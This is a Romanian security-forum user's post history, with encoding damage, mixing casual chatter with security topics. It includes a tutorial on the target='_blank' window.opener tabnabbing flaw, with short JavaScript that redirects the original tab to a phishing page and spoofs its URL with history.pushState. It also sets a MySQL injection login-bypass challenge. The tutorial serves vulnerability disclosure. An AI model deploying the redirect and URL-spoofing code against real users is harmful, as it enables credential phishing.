-
Posts
388 -
Joined
-
Last visited
-
Days Won
16
Everything posted by B7ackAnge7z
-
Compania Adobe Systems Incorporated a hot?rât s? fac? o fapt? bun? (chiar dac? ini?ial nu acesta era scopul final) ?i s? ofere gratuit Adobe Creative Suite 2. Da, este cam veche versiunea, îns? totu?i merge vorba de pachetul complet CS2, care include: Acrobat 3D 1.0 for Windows Acrobat Standard 7.0 Acrobat Pro 8.0 Audition 3.0 GoLive CS2 Illustrator CS2 InCopy CS2 InDesign CS2 Photoshop CS2 Photoshop Elements 4.0/5.0 Adobe Premiere Pro 2.0 Sunt disponibile versiunile pentru sistemele de operare Windows ?i Mac. Atât aplica?iile cât ?i serialele pot fi g?site pe pagina: CS2 downloads
-
Aici merge vorba despre o vulnerabilitate pentru browser, iar cei de la Google ?i Mozilla au fost în?tiin?a?i. Deci, de aceast? vulnerabilitate ar trebui s? se ocupe dezvoltatorii de browsere, ?i nu cei de site-uri. Cât despre Google Chrome pentru Android — da, acesta este vulnerabil.
- 13 replies
-
- browser
- javascript
-
(and 1 more)
Tagged with:
-
Într-adev?r, mi s-a spus ieri despre acest lucru. Plus c? nici nu observi c? pagina face „refresh”. Dac? e de pe acela?i domeniu nu e nici o problem? (fi?ierele cookie tot pot fi citite de pe acela?i domeniu). 1) Nu, nu de mine. Doar întâlnind aceast? „problem?” m-am apucat serios de studiat. Îns? dac? a? fi fost mai atent, trebuia s? ?tiu tot despre vulnerabilitate înc? din prim?vara lui 2012 (*ehh... dând am?rât din cap de mai multe ori*). 2) Sincer, nu am nici o idee. La început credeam c? nici document.referer nu merge dac? folose?ti click de dreapta, îns? în realitate nu e transmis doar obiectul window.opener
- 13 replies
-
- browser
- javascript
-
(and 1 more)
Tagged with:
-
Sper s? nu gre?esc dac? voi spune, c? ?tim cu to?ii ce e un link ?i la ce folose?te atributul target pentru tag-ul <a>. ?i dat fiind faptul c? majoritatea consider? inofensiv? folosirea acestei tehnici atât de populare, în acest tutorial voi încerca s? demonstrez contrariul. Pentru început vreau s? men?ionez c? ceea ce va fi descris aici, personal o consider a fiind o vulnerabilitate pentru toate browserele cu excep?ia... ta-da! — Internet Explorer. Iat? de ce în continuare voi folosi cuvântul „vulnerabilitate” atunci când m? voi referi la acest „fenomen”. De asemenea, v? rog s? atrage?i aten?ia c? aceast? vulnerabilitate v-a func?iona perfect doar dac? se va ap?sa click de stânga pe link, ?i nu click de dreapta ? „Deschide în fil? nou?”. ?i, nu în ultimul rând, a?a cum toat? lumea recomand? s? fie folosit target="_blank" pentru toate link-urile externe (doar nu dorim ca utilizatorul s? p?r?seasc? pagina noastr?), trebuie s? constat c? aceast? vulnerabilitate afecteaz? majoritatea site-urilor care fac referire la pagini externe. Teorie Dac? avem pagina curent? „A” ?i facem referire la pagina „B” folosind atributul target="_blank", atunci când se va deschide pagina „B” pentru aceasta va fi creat un obiect window.opener cu ajutorului c?ruia putem redirec?iona pagina „A” c?tre o nou? pagin? în timp ce utilizatorul acceseaz? pagina „B”. ?i cel mai important, paginile „A” ?i „B” pot fi pe domenii diferite. Practic? Pentru a în?elege mai bine despre ce merge vorba, v? recomand urm?torul exemplu: ap?sa?i click aici, a?tepta?i s? se încarce pagina, dup? care reveni?i înapoi. Dac? apare eroarea „window.opener is null” atunci: Ai deschis link-ul altfel decât folosind click de stânga; Browserul t?u nu e vulnerabil; Magie neagr?? Pentru un exemplu mai complex, v? rog s? accesa?i aceast? pagin? unde am folosit aceast? vulnerabilitate pentru a simula un atac de tip phishing asupra unui site ce ofer? servicii de email. Ca ?i pentru oricare site asem?n?tor (Gmail, Hotmail ?.a.) fiecare link primit într-un mesaj are atributul target="_blank". Explica?ii Pentru a exploata vulnerabilitatea, trimitem un mesaj ce con?ine adresa URL c?tre pagina „capcan?”, unde pentru a fi siguri c? utilizatorul a deschis link-ul, folosind click de stânga ?i nu alt? metod?, verific?m dac? exist? obiectul window.opener ?i nu este NULL. Dup? care, putem redirec?iona pagina de unde a venit utilizatorul. Codul arat? cam a?a: if (window.opener) { window.opener.location.replace('full-url-to-scam-page'); } Dup? cum pute?i observa, totul e atât de simplu, atât de banal, atât de periculos... Dac? pagina de phishing ?i cea legitim? arat? ca 2 pic?turi de ap?, iar numele domeniului nu d? de b?nuit, când utilizatorul va reveni la pagina ini?ial? cu siguran??, nu va observa modificarea. Pentru a da mai pu?in de b?nuit, poate fi modificat? adresa URL pentru pagina de phishing în felul urm?tor: De pe pagina funny.php e nevoie s? trimitem adresa URL (referrer) de unde a venit utilizatorul. Eu am f?cut a?a: var referrer = encodeURIComponent(document.referrer); window.opener.location = 'http://black.securrity.com/t_blank/scam.php#' + referrer; Apoi, pe pagina scam.php am folosit urm?torul cod: // Extragem leg?tura adresei URL ?i elimin?m numele domeniului var fakeurl = decodeURIComponent(window.location.hash).replace('#http://white.securrity.com', ''); // Modific?m adresa URL f?r? a înc?rca con?inutul acelei pagini window.history.pushState(false, false, fake_url); În loc de concluzii Sincer, nu în?eleg, ce a fost în capul dezvoltatorilor ca s? permit? executarea func?iei location.replace() sau modificarea obiectului location dintre dou? domenii diferite? Dac? era de pe acela?i domeniu, în?elegeam... ?i chiar e foarte straniu, c?ci celelalte func?ii ?i atribute ale obiectului window.opener nu pot nici m?car citite, deoarece:
- 13 replies
-
- 6
-
- browser
- javascript
-
(and 1 more)
Tagged with:
-
Sper c? nu te superi, dar niciodat? nu am în?eles de ce pun unii un player s? „huruie” atunci când intru pe site-ul lor? Oare nimeni nu se gânde?te c? eu (ca ?i oricare alt vizitator) prefer alt stil de muzic?, am boxele la maxim ?i ascult piesa mea preferat?, vorbesc cu cineva pe Skype, sau pur ?i simplu nu vreau s? fiu deranjat de nici un zgomot. ?i de cele mai multe ori îmi ia mai pu?in timp s? închid fila cu acel site decât s? caut de unde se opre?te acel player. Desigur, mai sunt cazuri când cautând pe Google ceva, deschid o mul?ime de file, iar când începe unul din acele site-uri s? „cânte” îmi plesne?te inima de bucurie ne?tiind care e cel mai „cool” dintre ele.
-
?inta: auth-c1 Rezolvare: https://rstforums.com/forum/63039-mysql-injection-challenge-authentication-bypass-2.rst#post444299 Nu ?tiu cât e de greu, a?a c? v? las pe voi s? decide?i. V? rog s? trimite?i r?spunsul în privat, iar eu voi actualiza postul în caz c? a?i trecut testul cu succes. Date tehnice: tabelul e simplu, are doar 2 câmpuri: name cu o lungime maxim? de 15 caractere ?i, pass unde e p?strat rezultatul func?iei MD5 pentru parola utilizatorului. Baft?! Solvers: 19-01-2013, 07:32 PM — tromfil Not?! Mai jos urmeaz? sugestiile pentru rezolvarea acestui challenge. Iat? de ce, dac? dore?ti s? rezolvi testul folosind cuno?tin?ele proprii — opre?te-te din citit! UPD1: Deci, se d? auth-c2 asem?n?tor cu auth-c1, doar c? metoda de securizare e diferit?. Pentru auth-c2 se folose?te func?ia mysqli_real_escape_string($link, $var) UPD2: A?a cum am spus, pentru auth-c1 este folosit? alt? metod? de securizarea, fiind utilizat? func?ia preg_replace('#[^\w]#', '', $var)
-
Dac? am în?eles corect, important este ca s? fie executat codul dintr-un fi?ier, ?i nu are nicio importan?? dac? codul HTML nu este valid (chiar ?i în screenshot-ul t?u se vede acest lucru). Dac? e a?a, presupun c? cunosc sintaxa (cel pu?in, merge pe Firefox ?i Chrome). ps. Dac? sincer, nici acum nu în?eleg ce filtru XSS au folosit b?ie?ii ?ia. Cu siguran?? arat? ca naiba.
-
Hm, pare a fi o vulnerabilitate în test.acunetix.com — dac? e a?a, am ve?ti proaste pentru tine
-
Acest lucru confirm? cele spuse de mine — decriptând un cod JavaScript, mul?i execut? codul în browser f?r? a se gândi la consecin?e. Totu?i, sper ca majoritatea acestor persoane s? fi folosit o ma?in? virtual?.
-
PEdump.me este un site ce permite în regim online extragerea informa?iilor din fi?ierele executabile de tip PE (Portable Executable) precum .exe, .dll, .sys, .scr, .ocx ?i altele. De asemenea, PEdump.me va încerca s? identifice ce Packer sau Compiler a fost folosit. Pe lâng? extragerea informa?iilor despre fi?ier, aplica?ia scaneaz? fi?ierul de viru?i cu ajutorul anti-virusului ClamAV ?i serviciului web VirusTotal. Momentan, PEdump.me suport? urm?toarele tipuri de executabile: DOS MZ EXE Win16 NE Win32 PE Win64 PE Dup? ce va analiza fi?ierul, PEdump.me va genera un raport ce va con?ine: Numele ?i m?rimea fi?ierului Suma de control MD5 MIME Type-ul fi?ierului Rezultatul scan?rii de viru?i MZ/NE/PE Header „Rich Signature” generat? de compilatoarele Microsoft DOS stub Lista fi?ierelor ?i bibliotecilor incluse Informa?ii generale despre aplica?ie (versiune, nume, produc?tor ?.a.) Resursele folosite (imagini ?i alte fi?iere utilizate la interfa?a grafic?) ?i multe altele ?i nu în ultimul rând trebuie de men?ionat c? aplica?ia a fost dezvoltat? folosind limbajul de programare Ruby, iar codul surs? poate fi g?sit pe github.com WebSite: www.pedump.me Exemplu: calc_upx.exe
-
Vezi Antichat, Xaker.name, Xaknet, Exploit.IN ?i cel men?ionat de Graphik. De asemenea, po?i c?uta pe Google.ru — „???-?????”, „????????? ?????” sau „????? ????? ? ??????”.
-
Problema e c? Google gre?e?te traducând „????.” ca „core”. Îns?, „????.” e prescurtarea la cuvântul „??????” ceea ce înseamn? „traffic”.
-
Cred c? cea mai eficient? este: <input onfocus="if(this.value==this.defaultValue){this.value=''}" onblur="if(!this.value){this.value=this.defaultValue}" type="text" value="Search..." name="s" id="s" />
-
Am în?eles — ai probleme cu sim?ul umorului, dore?ti s? pl?te?ti pe cineva s?-?i dezvolte acest sim?, iar a doua zi dup? apocalips? s? râzi ca nebunu'
-
Pentru urm?toarele s?pt?mâni propun urm?toarele titluri la aceast? ?tire (con?inutul îl scrie?i dup? bunul plac): Bogomil Shopov a cump?rat 1M de conturi Facebook EXCEP?IONAL! Un milion de conturi Facebook la doar $5 Un hacker bulgar b0g0m1l_sh0p0v a spart serverele Facebook Vulnerabilitatea în site-ul Facebook permite extragerea datelor publice Anonymous vinde baza de date Facebook cu $5 ... S? fim serio?i, faptul c? titlul, textul ?i/sau sursa au fost modificate, nu înseamn? c? ?tirea trebuie postat? de 20 de ori — fiecare site de ?tiri va edita aceste date. ?i cel mai r?u, majoritatea site-urilor vor încerca s? schimonoseasc? ?tirea dup? bunul lor plac, ad?ugând sau excluzând lucruri mai mult sau mai pu?in „importante”. Cel mai corect ar fi s? se traduc? sursa original? ?i/sau s? fie pus un link c?tre aceasta (?i nu m? refer la site-urile unde a?i g?sit ?tirea). De exemplu, în cazul dat, nu e vorba de money.ro, forbes.com, dragosgaftoneanu.com sau altele. E vorba de talkweb.eu — blogul autorului. ps. ?i da, milionul de idio?i î?i merit? soarta, doar ei singuri accept? toate aplica?iile f?r? excep?ie ?i apas? Yes » Continue » Sell your soul » I agree » Continue f?r? s? citeasc? ce scrie pe-acolo.
-
@Nytro, Totul e mult mai simplu ?i nu e nevoie de ghicit — dat fiind faptul c? pe 21 decembrie va fi sfâr?itul lumii, to?i vor urm?ri apocalipsa, iar ei nu vor fi nevoi?i s? mai demonstreze ceva
-
Încearc?: Win+R -> explorer.exe -> OK
-
Am ad?ugat un update la post, ca s? nu se chinuie doritorii de conturi Skype, ?i/sau s? nu apar? mesaje precum c? nu merge. Apropo, conturile ob?inute folosind aceast? metod? au fost suspendate (cic? pentru siguran?a utilizatorului). Iar pentru recuperarea contului trebuie s? demonstreze c? nu e Bin Laden.
-
A?tept cu ner?bdare ps. Momentan, nu avem persoane care s? fi decriptat codul.
-
Din câte cunosc eu, despre vulnerabilitate se ?tia de pe la începutul verii. ?i cu siguran?? nu ajungea în public dac? cu ceva timp în urm? nu ar fi fost spart contul unuia „mai priceput” care a în?eles cum st? treaba. Plus, în ultimele s?pt?mâni tot mai multe persoane se trezeau cu contul spart ?i email-ul plin de notific?ri de resetarea parolei.